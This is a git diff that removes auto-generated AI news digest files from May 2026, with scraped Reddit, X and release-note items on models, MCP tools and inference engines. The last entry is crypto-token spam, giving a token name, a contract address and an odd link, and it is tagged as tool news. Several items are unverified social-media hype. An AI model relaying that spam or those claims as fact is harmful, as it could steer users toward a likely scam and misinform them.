### Changelog * release(turborepo): 2.9.8 by @github-actions[bot] in https://github.com/vercel/turborepo/pull/12700 * fix: Remove Unix parent death watchdogs by @anthonyshew in https://github.com/vercel/turborepo/pull/12699 * release(turborepo): 2.9.9-canary.1 by @github-actions[bot] in https://github.com/vercel/turborepo/pull/12705 * fix: Scope repo index prefixes to Git root by @anthonyshew - ---- - -## [pnpm v11.0.5 released](https://github.com/pnpm/pnpm/releases/tag/v11.0.5) -*GitHub Releases · pnpm* | 04/05/2026 | Score: 0.92 -Tags: github_release, cli_tool - -> ## Patch Changes * Drop the `darwin-x64` artifact from `@pnpm/exe` and from the GitHub release page. The Node.js SEA mechanism `pnpm pack-app` uses produces a binary that segfaults at startup on Intel Macs because of an upstream Node.js bug ([nodejs/node#62893](https://github.com/nodejs/node/issues/62893), tracked alongside [#59553](https://github.com/nodejs/node/issues/59553); the Node.js team has [opted not to fix it](https://github.com/nodejs/node/pull/60250) on the grounds that x64 macOS - ---- - -## [A new open weights image model appears in ArtificialAnalysis. Outperforming Flux.2 Pro and Z Image Turbo.](https://reddit.com/r/StableDiffusion/comments/1t3rd6m/a_new_open_weights_image_model_appears_in/) -*Reddit r/StableDiffusion* | 04/05/2026 | Score: 1.00 -Tags: open_source - -> A new open weights image model appears in ArtificialAnalysis. Outperforming Flux.2 Pro and Z Image Turbo. - ---- - -## [Machines Are Getting Onchain Passports and Credit Ratings Now — peaqOS Is Live](https://x.com/peaq/status/2051288009081782473) -*Aligned News (Scoble)* | 04/05/2026 | Score: 1.00 -Tags: tool_update - -> peaq launched peaqOS, giving physical machines verifiable digital identities, passports, and credit ratings recorded on-chain. The company also welcomed its first non-human team member. The machine economy is not a future concept anymore. - ---- - -## [AI Invented a Math Framework. Humans Used It to Solve Two 60-Year-Old Conjectures](https://x.com/WesRoth/status/2051300819878936591) -*Aligned News (Scoble)* | 04/05/2026 | Score: 1.00 -Tags: developer_tool - -> An AI-generated mathematical framework originally used to solve Erdős Problem 1196 has now been generalized to prove a second 60-year-old conjecture. The model did not assist the discovery. It was the discovery. - ---- - -## [Cursor Team Kit Just Released — The Internal Skills the Cursor Team Uses to Build Cursor](https://x.com/ericzakariasson/status/2051255780167610522) -*Aligned News (Scoble)* | 04/05/2026 | Score: 1.00 -Tags: cli_tool - -> The Cursor engineering team open-sourced Cursor Team Kit, containing the internal slash commands they use to build the Cursor editor at Cursor. It includes verify-this, fix-merge-conflicts, pr-review-canvas, and cli-automation-harness. - ---- - -## [Ace-Step-1.5-Api-server-UI](https://reddit.com/r/StableDiffusion/comments/1t39bjl/acestep15apiserverui/) -*Reddit r/StableDiffusion* | 04/05/2026 | Score: 1.00 -Tags: api_update - -> [Ace-Step-1.5-Api-server-UI](https://github.com/tritant/Ace-Step-1.5-Api-server-UI) # Features [](https://github.com/tritant/Ace-Step-1.5-Api-server-UI#features) * **Compose** — Text-to-music generation with full parameter control * **Cover** — Style transfer from a reference audio * **Repaint** — Selective region editing with WaveSurfer timeline * **Base ★** — Exclusive Base model modes: * 🧱 **Lego** — Add a specific instrument track to an existing mix * 🔬 **Extract** — Isolate a stem from a mix * 🎹 **Complete** — Generate accompaniment for an existing track * Multi-track timeline with per-track solo/mute/volume * Persistent configuration via localStorage * Batch generation support * Multi lora support - ---- - -## [Meta Abandons Open Source — Days After LlamaCon](https://x.com/thenewstack/status/2050017453615301067) -*Aligned News (Scoble)* | 04/05/2026 | Score: 1.00 -Tags: open_source - -> Meta abandoned open-source Llama for proprietary Muse Spark just days after LlamaCon celebrated one billion downloads, a dramatic reversal with major implications for the AI developer community. - ---- - diff --git a/data/digest-2026-05-05.md b/data/digest-2026-05-05.md deleted file mode 100644 index d14aac4..0000000 --- a/data/digest-2026-05-05.md +++ /dev/null @@ -1,125 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-05** | 15 stories | Auto-generated from 540 archived stories - ---- - -## [torch-nvenc-compress: GPU NVENC silicon as a PCIe bandwidth multiplier — PCA + pure-ctypes Video Codec SDK wrapper. Parallel-path overlap measured at 67% of theoretical max on a real GEMM + encode workload. [P]](https://reddit.com/r/MachineLearning/comments/1t2zy4h/torchnvenccompress_gpu_nvenc_silicon_as_a_pcie/) -*Reddit r/MachineLearning* | 03/05/2026 | Score: 1.00 -Tags: api_update, open_source, developer_tool, tool_update - -> I've been working on the consumer-multi-GPU PCIe bottleneck — Nvidia removed NVLink from the 4090/5090, and splitting a 70B model across two consumer cards drops you to \~30 GB/s over PCIe peer-to-peer. Spent the last few months building a Python library that uses the GPU's otherwise-idle NVENC/NVDEC silicon to compress activations and KV cache on the fly, then ships the small bitstream across the same wire. **Repo:** [https://github.com/shootthesound/torch-nvenc-compress](https://github.com/shootthesound/torch-nvenc-compress) (Apache 2.0) # Prior art (this isn't novel as an idea) * **LLM.265 — "Video Codecs are Secretly Tensor Codecs"** (late 2025). The closest direct precedent: same insight applied to LLM weights, activations, KV cache. * **KVFetcher** (April 2026). KV compression for remote prefix fetching. * **CodecFlow** (April 2026). Codec motion-vector metadata for KV refresh during prefill. The "video codec on tensors" idea was already in the literature when I started. What's added in this work: 1. **PCA + rank-truncation as preprocessing.** Activations and KV in their standard basis are noise-like (\~4× compression floor, basically the Gaussian-noise limit). The PCA basis… - ---- - -## [Released a TurboQuant-compatible KV backend evaluation SDK](https://reddit.com/r/LocalLLaMA/comments/1t4ls7i/released_a_turboquantcompatible_kv_backend/) -*Reddit r/LocalLLaMA* | 05/05/2026 | Score: 1.00 -Tags: api_update, developer_tool, tool_update - -> Disclosure: I am the author of this evaluation SDK. I released an independent TurboQuant-compatible KV backend evaluation package for compressed-KV ABI testing, smoke tests, and partial attention decode experiments. The goal is narrow: test whether compressed KV-cache workloads can be routed through a clean low-level backend ABI for: \- compressed KV block registration \- KV dot / QK partial execution \- block-local attention partial decode \- capability probing \- fallback and correctness reporting \- minimal benchmark validation Repository: [https://github.com/ixu2486/tq\_compat\_eval](https://github.com/ixu2486/tq_compat_eval) This is not a Google project, not an official TurboQuant implementation, and not a replacement for TurboQuant, llama.cpp, or existing model runtimes. It is also not the full RetryIX runtime. The private runtime, scheduling policy, hardware-interface contracts, and internal routing logic are not included. I would appreciate feedback from people working on KV-cache optimization, quantized inference, compressed-KV formats, long-context decoding, or backend integration. - ---- - -## [Node.js v26.0.0 released (MAJOR UPDATE)](https://github.com/nodejs/node/releases/tag/v26.0.0) -*GitHub Releases · Node.js* | 05/05/2026 | Score: 1.00 -Tags: api_update, github_release, cli_tool - -> We're excited to announce the release of Node.js 26! Highlights include the Temporal API enabled by default, updates to the V8 JavaScript engine to 14.6, Undici to 8.0, and several important deprecations and removals as we continue to modernize the platform. As a reminder, Node.js 26 will enter long-term support (LTS) in October, but until then, it will be the "Current" release for the next six months. We encourage you to explore the new features and benefits offered by this latest release a - ---- - -## [Anthropic ships Claude for Creative Work with nine MCP-native connectors](https://reddit.com/r/ClaudeAI/comments/1t48vtx/anthropic_ships_claude_for_creative_work_with/) -*Reddit r/ClaudeAI* | 05/05/2026 | Score: 1.00 -Tags: mcp, developer_tool, tool_update - -> Anthropic announced Claude for Creative Work on April 28. The release includes nine official connectors that plug Claude into professional creative software, with a native Blender connector as the flagship. All nine are built on the Model Context Protocol (MCP), so Claude can read live project state and execute actions directly inside each app rather than operating through copy-paste workflows. The MCP piece is what makes this more than a plugin announcement. This is one of the first production-scale deployments where an LLM maintains persistent context within a host application's own data model. If the pattern holds up, it probably becomes the template for how agents integrate with domain-specific software more broadly. What creative tools would benefit most from this kind of native agent integration? I'd guess video editing is high on the list, but curious what others think. Announcement: [https://www.anthropic.com/news/claude-for-creative-work](https://www.anthropic.com/news/claude-for-creative-work) - ---- - -## [Offload routine Claude Code work to Gemma 4 through the Google GenAI API](https://reddit.com/r/ClaudeAI/comments/1t4sj9u/offload_routine_claude_code_work_to_gemma_4/) -*Reddit r/ClaudeAI* | 05/05/2026 | Score: 1.00 -Tags: api_update, mcp - -> The idea of offload-mcp is simple: instead of running hardware-hungry local models for routine work, let Claude offload that work to FREE model APIs and SAVE tokens. I’m using Gemma via the Google GenAI API because I like it in my processing pipelines, but running it locally on my MacBook Air is slow and resource-limited. The API path is much more practical for small jobs. I didn't find any other tool on GitHub or elsewhere to handle that. offload-mcp takes care of commit messages, PR summaries, translations, docstrings, source diff/file summaries, and freeform prompts. Freeform is what I use most: send almost any routine prompt to a cheaper model instead of burning expensive Claude Code or Codex context on it. The source-based mode can read local diffs/files directly through the MCP server and reports estimated primary input tokens avoided. The default model chain uses Gemma, but model IDs are configurable. Curious if this fits anyone else’s Claude workflow! GitHub: [https://github.com/peterhadorn/offload-mcp](https://github.com/peterhadorn/offload-mcp) - ---- - -## [Anomaly Detection Belongs in Your Database — built SIMD-accelerated isolation forests into Stratum's SQL engine [P]](https://reddit.com/r/MachineLearning/comments/1t4riem/anomaly_detection_belongs_in_your_database_built/) -*Reddit r/MachineLearning* | 05/05/2026 | Score: 1.00 -Tags: api_update, open_source - -> We added native anomaly detection in Stratum, our columnar analytics engine for the JVM. Train and score isolation forest models entirely from SQL — no Python, no export pipeline: SELECT * FROM transactions WHERE ANOMALY_SCORE('fraud_model') > 0.7; 6 microseconds per transaction, SIMD-accelerated, runs inside the query engine. The full write-up covers why we built it, how isolation forests work, and benchmarks against PyOD/scikit-learn: [https://datahike.io/notes/anomaly-detection-in-your-database/](https://datahike.io/notes/anomaly-detection-in-your-database/) Stratum is open source (Apache 2.0): [https://github.com/replikativ/stratum](https://github.com/replikativ/stratum) Happy to answer questions about the implementation — the isolation forest is pure Java with Vector API SIMD, scoring is fused into the query execution pipeline so it benefits from zone map pruning and chunked streaming. - ---- - -## [Gemini has a big outage going on but refuses to acknowledge on official status page! How do you know if an LLM API is actually down vs just you?](https://reddit.com/r/ClaudeAI/comments/1t4kbpa/gemini_has_a_big_outage_going_on_but_refuses_to/) -*Reddit r/ClaudeAI* | 05/05/2026 | Score: 1.00 -Tags: api_update, mcp - -> Genuine question. Gemini had a 5+ hour outage this morning. I found out because a user reported it on Tickerr, not because Google said anything. Status page was green the whole time. I built Tickerr using Claude Code for this only. It runs independent streaming API calls to LLM providers every 5 minutes and tracks real inference performance - not just HTTP pings. https://preview.redd.it/r6ugn0e57bzg1.png?width=1080&format=png&auto=webp&s=779961c2ee83245f9a46c10ced99f0ddc854494b The other way to know it's not just you is if other people are hitting the same thing at the same time. Which is why I also built a crowdsourced failure signal into [Tickerr.ai](https://tickerr.ai/mcp-server) \- agents report 5xx errors anonymously and get back whether others are seeing the same thing. It's free to try, if you want to add reporting to your agent, three ways depending on your setup: **MCP (Claude Code, Cursor, Windsurf):** report_incident(provider="google", model="gemini-2.5-flash", error_code=503, error_type="overloaded") **REST (any language):** curl -X POST https://tickerr.ai/api/v1/report \ -H "Content-Type: application/json" \ -d '{"provider":"google","model":"gemini-2.5-fla… - ---- - -## [SenseNova-U1-8B-MoT (novel open source multimodal understanding + image generation model) seems like a bigger deal architecturally then it’s getting credit for](https://reddit.com/r/LocalLLaMA/comments/1t4i1yx/sensenovau18bmot_novel_open_source_multimodal/) -*Reddit r/LocalLLaMA* | 05/05/2026 | Score: 1.00 -Tags: open_source, tool_update - -> SenseNova dropped SenseNova-U1 on the last day of April and I’ve only found like one other mostly ignored post on this sub talking about it. It seems like a really exciting novel architecture to me. It appears to be exceptional at text-to-infographics as one of its major high points, as well as being good at image editing, generation, and visual understanding. Supposedly it’s not the traditional mash-up (no VAE) types of multimodal models that we’ve seen before. The following is from their Hugging Face: https://huggingface.co/sensenova/SenseNova-U1-8B-MoT ——— Overview SenseNova U1 is a new series of native multimodal models that unifies multimodal understanding, reasoning, and generation within a monolithic architecture. It marks a fundamental paradigm shift in multimodal AI: from modality integration to true unification. Rather than relying on adapters to translate between modalities, SenseNova U1 models think-and-act across language and vision natively. The unification of visual understanding and generation opens tremendous possibilities. SenseNova U1 sits in the stage of Data-driven Learning (like ChatGPT), yet gestures toward the next stage, that is, Agentic Learning (like Ope… - ---- - -## [Local Dream 2.4.3 - SDXL support, tag autocomplete and more](https://reddit.com/r/StableDiffusion/comments/1t4d7ix/local_dream_243_sdxl_support_tag_autocomplete_and/) -*Reddit r/StableDiffusion* | 05/05/2026 | Score: 1.00 -Tags: product_launch, tool_update - -> Local Dream 2.4 was released two weeks ago and has since received three more updates. The main new features: \- SDXL/Illustrious/PonyXL support for Snapdragon 8 Gen 3 and newer (Elite) chips, based on NPU \- Tag autocomplete from CSV import \- Token counter for prompts \- LCM scheduler and many more fixes have been added. It’s worth checking out the release notes for version 2.4! [https://github.com/xororz/local-dream/releases](https://github.com/xororz/local-dream/releases) - ---- - -## [Building a 9-ball AI player: Candidate generation for direct cut shots [P]](https://reddit.com/r/MachineLearning/comments/1t3xplr/building_a_9ball_ai_player_candidate_generation/) -*Reddit r/MachineLearning* | 05/05/2026 | Score: 1.00 -Tags: open_source, developer_tool - -> I'm building a 9-ball-player to help with pattern play. There are many ways to make the next ball, and sometimes in more than one obvious pocket. Which should should you choose depends on probability of making that shot AND ending up in a favorable spot for the next shot, that is also amenable to getting good position for the shot after. To that end, I have built the following components: * A transformer based model that learns p(win) given a table layout. * Candidate shot generator that includes cut shots, bank shots, kick shots, caroms and combination shots as well as safeties. * An evaluator that will pick the best shots based on the p(win) model on the resulting state of each candidate shot. The ground truth: **pooltool** Pool physics is well-modeled but expensive. I use pooltool python library, a solid open-source billiards simulator with accurate ball-cushion-pocket-felt interactions. A single shot takes \~5–15 ms to simulate end-to-end on one CPU thread for the typical 1–3 object-ball layouts that come up in shot evaluation; full racks (9 object balls) push that to \~20–50 ms because there are more pairwise collisions to track. Sounds fast until you do the math. For each la… - ---- - -## [Parax v0.5: Parametric Modeling in JAX [P]](https://reddit.com/r/MachineLearning/comments/1t3jmdc/parax_v05_parametric_modeling_in_jax_p/) -*Reddit r/MachineLearning* | 04/05/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> Hi everyone! Just sharing an update on my project [Parax](https://github.com/gvcallen/parax), which caters for "parametric modeling" in JAX. Previously, Parax was more focused on scientific applications, however I've since generalized it to be a tool useful for any type of JAX work. It now has a strong focus on a clean, extandable API, as well as ensuring the library is entirely **opt-in,** as opposed to its previous versions which took a more framework-like approach. Some of Parax's features: * Derived/constrained parameters with metadata * Computed PyTrees and callable parameterizations * Abstract interfaces for fixed, bounded, and probabilistic PyTrees and parameters * Filtering and manipulation tools The documentation is available [here](https://gvcallen.github.io/parax/) along with some basic examples. Perhaps the package is of use to someone out there! Cheers, Gary - ---- - -## [AutoBe benchmark: structured harness narrows frontier-vs-local gap in backend generation [D]](https://reddit.com/r/MachineLearning/comments/1t3hks9/autobe_benchmark_structured_harness_narrows/) -*Reddit r/MachineLearning* | 04/05/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> AutoBe is a benchmark for end-to-end backend generation. One natural language request produces six outputs: requirements analysis, ERD, OpenAPI spec, E2E tests, NestJS implementation, and a type-safe SDK. Each phase fills a predefined AST via structured function calling rather than generating unstructured code. The scoring rubric is 100 points driven entirely by static analysis - the same artifact scores the same regardless of who reruns it. The headline finding is that scores cluster tightly. GLM 5 tops the benchmark run. qwen3.5-27b sits directly behind frontier models. Several local models produced enterprise-scale backends with 100% compile success. The author's interpretation: once the harness is structured, backend-generation quality is constrained more by harness design than by model prestige. The cost contrast is significant. A full benchmark run at frontier pricing ($5/M input tokens) runs $1,000-$1,500 per model. The next benchmark round plans to filter to models at $0.25/M input or runnable on a 64GB unified-memory laptop - which would include most of the models that clustered near the top anyway. The honest caveat from the author: this uses four reference projects and… - ---- - -## ["FLUX Creator Program" - New Flux models sooner than expected?](https://reddit.com/r/StableDiffusion/comments/1t4vlo7/flux_creator_program_new_flux_models_sooner_than/) -*Reddit r/StableDiffusion* | 06/05/2026 | Score: 1.00 -Tags: open_source - -> are we getting new Flux models soon? hopefully open source. Would love a new klein model [link](https://x.com/bfl_ml/status/2051723708046233688) to post - ---- - -## [Best Open Source models for running on Gaming PC or Mac mini M4](https://reddit.com/r/StableDiffusion/comments/1t4p2mn/best_open_source_models_for_running_on_gaming_pc/) -*Reddit r/StableDiffusion* | 05/05/2026 | Score: 1.00 -Tags: open_source - -> I have a gaming PC with a Nvidia 5070 12gb VRAM 32gb RAM and a ryzen 9 7800x 12 core I also have a Mac mini m4 * Chip (Processor): Apple M4 chip with 10-core CPU, 10-core GPU, 16-core Neural Engine * Memory: 32GB unified memory * Storage: 512GB SSD storage Wanted to get opinions on best open source models for agentic and generative purposes on these machines Thank you! - ---- - -## [OpenAI has released GPT-5.5 Instant as the new default model for ChatGPT. The update features improved reasoning benchmarks, reduced hallucinations in specialized fields, and enhanced context management with cross-platform memory integrati…](https://x.com/H_Mhatre_/status/2051715305890521578) -*X / @h_mhatre_* | 05/05/2026 | Score: 1.00 -Tags: tool_update - -> OpenAI has released GPT-5.5 Instant as the new default model for ChatGPT. The update features improved reasoning benchmarks, reduced hallucinations in specialized fields, and enhanced context management with cross-platform memory integration. $MSFT - ---- - diff --git a/data/digest-2026-05-06.md b/data/digest-2026-05-06.md deleted file mode 100644 index c561332..0000000 --- a/data/digest-2026-05-06.md +++ /dev/null @@ -1,123 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-06** | 15 stories | Auto-generated from 542 archived stories - ---- - -## [[WIP] ComfyUI Powered Klein 2 KV Edit i2i plugin (Chromium)](https://reddit.com/r/StableDiffusion/comments/1t5rofv/wip_comfyui_powered_klein_2_kv_edit_i2i_plugin/) -*Reddit r/StableDiffusion* | 06/05/2026 | Score: 1.00 -Tags: api_update, open_source, developer_tool - -> This is something I am working on based upon an earlier WIP item that was using ZiT for something similar. However with Klein KV a lot of power to manipulate is in the prompts. So I am currently testing/building an i2i web browser plugin that allows custom prompt creating and saving and can be expanded and sorted by tabs. I'm going to post this link as a demo and/or bones for other to also take and run with as well. I do plan on updating some things here myself in my upcoming free time, but for some people this might be just what may work for them. At the end of the day it's all just html/js/css and we all have LLM's and enjoy open source. This can also be converted to a firefox plugin if you wish as well. Feel free to take it and do whatever else you may want to and consider this the starter template for it. [https://github.com/deadinside/comfyui-workflows/blob/main/Web%20Browser%20Plugins/K2\_KVEdit\_i2i%20-%20Chromium%20Sidebar-Demo.zip](https://github.com/deadinside/comfyui-workflows/blob/main/Web%20Browser%20Plugins/K2_KVEdit_i2i%20-%20Chromium%20Sidebar-Demo.zip) If you never interacted with ComfyUI outside of it, you will need to enable API mode in the settings. You will al… - ---- - -## [OpenClaw/PENexus Agent update complete — All 11 agents configured with Discord routing, OpenClaw updated to 2026.5.5, new provider keys added, X API connected via xurl CLI](https://x.com/Reeperr131/status/2052074977973694608) -*X search / Agent workflows* | 06/05/2026 | Score: 1.00 -Tags: api_update, cli_tool, tool_update - -> OpenClaw/PENexus Agent update complete — All 11 agents configured with Discord routing, OpenClaw updated to 2026.5.5, new provider keys added, X API connected via xurl CLI - ---- - -## [CopilotKit (MIT) - Open-Source Building Blocks for Agent Apps and Generative UI](https://reddit.com/r/LocalLLaMA/comments/1t5gus6/copilotkit_mit_opensource_building_blocks_for/) -*Reddit r/LocalLLaMA* | 06/05/2026 | Score: 1.00 -Tags: api_update, open_source, developer_tool - -> Even with agent framework DX getting somewhat better - it's still really annoying to build real apps with them. Even a basic in-app agent chatbot already drags in streaming, tool call rendering, and state sync. Vercel's AI SDK makes it much easier to start, but it pulls you right into Vercel's whole stack and is too opinionated on the agent framework side. This is what is great about CopilotKit (30k stars, MIT). They provide React building blocks for the agent UI layer: chat, streaming, tool calls, HITL, generative UI. The piece that makes it horizontal is AG-UI, an open protocol it speaks on the backend, with shipped support in LangGraph, ADK, Strands, CrewAI, Mastra, Pydantic AI, LlamaIndex, Agno, and others. Same UI, any agent framework, no per-framework adapter. Bring your own everything: agent, model, backend, hosting. It's really powerful. I discovered CopilotKit after being involved with the community on open source AG-UI which they're very involved with. Have had a great experience building with it! Not sure why people aren't talking about it more. Repo: [https://github.com/CopilotKit/CopilotKit](https://github.com/CopilotKit/CopilotKit) - ---- - -## [2.5x faster inference with Qwen 3.6 27B using MTP - Finally a viable option for local agentic coding - 262k context on 48GB - Fixed chat template - Drop-in OpenAI and Anthropic API endpoints](https://reddit.com/r/LocalLLaMA/comments/1t57xuu/25x_faster_inference_with_qwen_36_27b_using_mtp/) -*Reddit r/LocalLLaMA* | 06/05/2026 | Score: 1.00 -Tags: api_update, product_launch, agent_tool - -> > **WARNING: wait before download from HF: I just realised my upload of the new versions with the additional fix in the chat template has not completed yet. I will remove this warning once done** The recent PR to llama.cpp bring MTP support to Qwen 3.6 27B. This uses the built-in tensor layers for speculative decoding. None of the existing GGUF have it, as they need to be converted with this PR. I have tested it locally on my mac M2 Max 96GB, and the results are amazing: 2.5x speed increase, bringing it to 28 tok/s! In addition the recent releases of llama.cpp also support turboquants, which helps a lot with memory usage in more constrained environment (including an additional speed boost). I have converted the most useful quants and uploaded them to HF. Even if you are using apple silicon, you should use those instead of MLX. You can download them here: [https://huggingface.co/froggeric/Qwen3.6-27B-MTP-GGUF](https://huggingface.co/froggeric/Qwen3.6-27B-MTP-GGUF) This also includes 7 fixes I made to the original jinja chat template, due to vLLM specificity which broke in other tools: https://huggingface.co/froggeric/Qwen-Fixed-Chat-Templates For now, you will need to compile yo… - ---- - -## [Getting error "command 'claude-vscode.editor.openLast' not found", but not like anyone has talked about.](https://reddit.com/r/ClaudeAI/comments/1t51ayl/getting_error_command_claudevscodeeditoropenlast/) -*Reddit r/ClaudeAI* | 06/05/2026 | Score: 1.00 -Tags: api_update, developer_tool, cli_tool - -> I've read many posts and github pages about this exact issue, but mine is different. Its not jsut that error. Any anthropic claude code command from logout to open in sidebar resutls in the error "Command 'Claude Code: <command>' resulted in an error. command 'claude-vscode.sidebar.<command>' not found". I have tried to diagnose and fix the issue and its not working. Here is what is not working: 1. Claude sidebar not working 2. No claude commands from command pallete working 3. Claude extension icon not showing up on far left side and not in the dropdown for extensions to show Here is the error from Developer: Show Logs.. with choosing Extension Host: `2026-05-05 21:57:07.411 [error] Activating extension Anthropic.claude-code failed due to an error:` `2026-05-05 21:57:07.412 [error] TypeError: The argument 'filename' must be a file URL object, file URL string, or absolute path string. Received 'file:///home/runner/work/claude-cli-internal/claude-cli-internal/build-agent-sdk/sdk.mjs'` `at Module.createRequire (node:internal/modules/cjs/loader:1922:13)` `at Object.<anonymous> (c:\Users\___\.vscode\extensions\anthropic.claude-code-2.1.129-win32-x64\extension.js:102:… - ---- - -## [UniReasoner: Using LLMs as "Universal Reasoners" to Fix Prompt Alignment](https://reddit.com/r/StableDiffusion/comments/1t5p67x/unireasoner_using_llms_as_universal_reasoners_to/) -*Reddit r/StableDiffusion* | 06/05/2026 | Score: 1.00 -Tags: product_launch, developer_tool - -> A new paper titled Large Language Models are Universal Reasoners for Visual Generation introduces UniReasoner, a framework designed to close the "understanding-generation gap" in text-to-image models. The core observation is that while unified multimodal models often fail to follow complex prompts during generation (e.g., getting counts or spatial relations wrong), the exact same model is usually excellent at verifying those mistakes when looking at the resulting image. Current models like BAGEL might generate five apples when asked for four. However, if you ask that same model to count the apples in its own generated image, it correctly identifies there are five. This suggests that the model's "understanding" capacity is much stronger than its "generative" capacity. UniReasoner converts this verification strength into direct guidance for the diffusion process using a three-stage pipeline: 1. The LLM generates a coarse visual draft using discrete vision tokens. This acts as a spatial and semantic plan for the scene. 2. The same LLM evaluates its draft against the original prompt. It produces a "grounded evaluation" in text, pinpointing exactly what is wrong (e.g., "Missing a bicyc… - ---- - -## [Followup to the kanban for Claude Code - now vibeyard's home screen is a yard I build myself](https://reddit.com/r/ClaudeAI/comments/1t5og8l/followup_to_the_kanban_for_claude_code_now/) -*Reddit r/ClaudeAI* | 06/05/2026 | Score: 1.00 -Tags: open_source, cli_tool - -> Even with the kanban, I still opened 3 tabs every morning - PRs in GitHub, tasks on the board, half-finished sessions in the terminal - just to figure out what to work on. So I made the home screen of **Vibeyard** (open-source, MIT) a yard you build yourself. Drop in widgets - open PRs, issues, AI readiness, active sessions, kanban, team - arrange them however you want. **Click any card → it spawns a Claude session scoped to it. A PR opens a review session. An issue opens a plan-the-fix session. A stale session resumes where you left off.** (Followup to my last post: https://www.reddit.com/r/ClaudeAI/comments/1sye8bs/) GitHub: [https://github.com/elirantutia/vibeyard](https://github.com/elirantutia/vibeyard) **Contributions and feedbacks are welcome!** - ---- - -## [Internal tools wIth no MCP](https://reddit.com/r/ClaudeAI/comments/1t5ah5r/internal_tools_with_no_mcp/) -*Reddit r/ClaudeAI* | 06/05/2026 | Score: 1.00 -Tags: api_update, mcp - -> We have several internal systems that all have robust APIs. Some are internet facing and some are not. None of them have MCP servers available for them. Im trying to figure out what and how the best way is to connect Claude Enterprise to these systems via API to pull the data we need from them with MCP. - ---- - -## [Show HN: Adam – An embeddable cross-platform AI agent library](https://github.com/sqliteai/adam) -*Hacker News* | 06/05/2026 | Score: 0.96 -Tags: developer_tool, agent_tool - ---- - -## [The GB10 Solution Atlas is now open source, the inference engine made for the community with breakneck inference speeds (Qwen3.6-35B-FP8 100+ tok/s)](https://reddit.com/r/LocalLLaMA/comments/1t5p2yv/the_gb10_solution_atlas_is_now_open_source_the/) -*Reddit r/LocalLLaMA* | 06/05/2026 | Score: 1.00 -Tags: open_source - -> Some of you saw our post a couple weeks back about hitting 102 tok/s stable on Qwen3.5-35B on a DGX Spark. A lot of you asked "cool, where's the code?" Today's the day: [Github](https://github.com/Avarok-Cybersecurity/atlas) **Atlas is open source.** Pure Rust + CUDA, no PyTorch, no Python runtime, \~2.5 GB image, <2 minute cold start. We rewrote the whole stack from HTTP handler to kernel dispatch because the bottleneck on Spark wasn't the silicon, it was 20+ GB of generic Python machinery sitting between your prompt and the GPU. We need community support to keep elevating Atlas **for developers**. **Numbers on a single DGX Spark (GB10):** Qwen3.5-35B (NVFP4, MTP K=2): 130 tok/s peak, \~111 tok/s sustained → 3.0–3.3x vLLM at testing time Qwen3.5-122B (NVFP4, EP=2): \~50 tok/s decode Qwen3-Next-80B-A3B (NVFP4, MTP): \~87 tok/s Nemotron-3 Nano 30B (FP8): \~88 tok/s Full model matrix on the site (Minimax2.7, Qwen3.6, Gemma too!) **What's actually different:** Hand-tuned CUDA kernels for Blackwell SM120/121 meaning attention, MoE, GDN, Mamba-2. No generic fallbacks. Native NVFP4 + FP8 on tensor cores MTP (Multi-Token Prediction) speculative decoding for up to 3x throughput on deco… - ---- - -## [Anyone else tried this RefineAnything LoRA? Pretty impressed so far](https://reddit.com/r/StableDiffusion/comments/1t5n9nz/anyone_else_tried_this_refineanything_lora_pretty/) -*Reddit r/StableDiffusion* | 06/05/2026 | Score: 1.00 -Tags: developer_tool - -> Been messing around with the RefineAnything project for the past few days and honestly the results are kinda wild for local detail fixes. Figured I'd share in case anyone else is into this stuff. Quick rundown of what it does: you give it an image + a region (scribble mask or bounding box), and it cleans up just that area — text, logos, product labels, thin lines, that kind of thing. The rest of the image stays untouched. Works with or without a reference image too. Original project: [https://github.com/limuloo/RefineAnything](https://github.com/limuloo/RefineAnything) While I was testing it I got tired of doing the mask prep, reference alignment, and paste-back manually every time, so I built a little ComfyUI plugin to handle all that. Just wanted to be clear though — **the plugin isn't tied to this specific LoRA at all**. It's totally model-agnostic, so it should work fine for pretty much any local detail repair workflow you're already running. RefineAnything just happens to be what I tested it with, and my test workflow is included in the plugin repo if you want to try it. Plugin: [https://github.com/1Kynx/ComfyUI-RefineNode](https://github.com/1Kynx/ComfyUI-RefineNode) Where I… - ---- - -## [I analyzed 922 agentic task trace and found the secret weapon of DeepSeek v4](https://reddit.com/r/LocalLLaMA/comments/1t5lywi/i_analyzed_922_agentic_task_trace_and_found_the/) -*Reddit r/LocalLLaMA* | 06/05/2026 | Score: 1.00 -Tags: open_source - -> I recently did a benchmark of deepseek v4 in agentic tasks. Performance-wise, it's one of the best open source models, as expected. What really surprised me is the cost. I mean I know it's cheap, but it's cheap in a way that doesn't really make sense. # Cost Estimation Let's take v4 flash as example since it's not on sale (so it can better reflect the actual provider cost). [deepseek v4 flash price on openrouter](https://preview.redd.it/vh4qfgn6zjzg1.png?width=562&format=png&auto=webp&s=8df0fae84b5b5840efdc87e50ef2db6a5fc23134) [opus 4.7 price on openrouter](https://preview.redd.it/c7qumr2u0kzg1.png?width=533&format=png&auto=webp&s=31101fb42a75d2ba33169c570c61e4297c28901b) Looking at OpenRouter price, deepseek v4 flash price is about 0.03x opus 4.7 price. (We only look at input token price because in long agentic task, input token is the dominant cost.) So if v4 flash uses similar amount of token in a task as opus 4.7, the actual cost should be somewhere around 0.03x compared to using opus. # Actual Data Then I ran the benchmark, long agentic tasks running in openclaw (which uses PI for agent loop), openrouter as model provider. The actual cost data blew my… - ---- - -## [the most boring saas on the internet: packager. automates software deployment for it admins via microsoft intune. launched free on reddit. moved to $25/mo after refinement. $60k/mo today. not "ai productivity copilot for everyone." one pai…](https://x.com/NovaByArun/status/2052077319960047791) -*X search / AI vibes* | 06/05/2026 | Score: 1.00 -Tags: tool_update - -> the most boring saas on the internet: packager. automates software deployment for it admins via microsoft intune. launched free on reddit. moved to $25/mo after refinement. $60k/mo today. not "ai productivity copilot for everyone." one painful workflow. one credible audience. - ---- - -## [Update DEXScreener ⊢Token⎼ BULULULUP ⊢CA⎼ BRzMym3YfDJ3NpuP9QmXDUMeh3wguYZqWZd2Lo4Ry7oA ⊢MCP⎼ 20.4K Unleash Your Inner Glow with BULULULUP! Check https:// OKAI.HK/ALpha](https://x.com/AzaleasWatkin/status/2052075760354238868) -*X search / Agent workflows* | 06/05/2026 | Score: 1.00 -Tags: mcp - -> Update DEXScreener ⊢Token⎼ BULULULUP ⊢CA⎼ 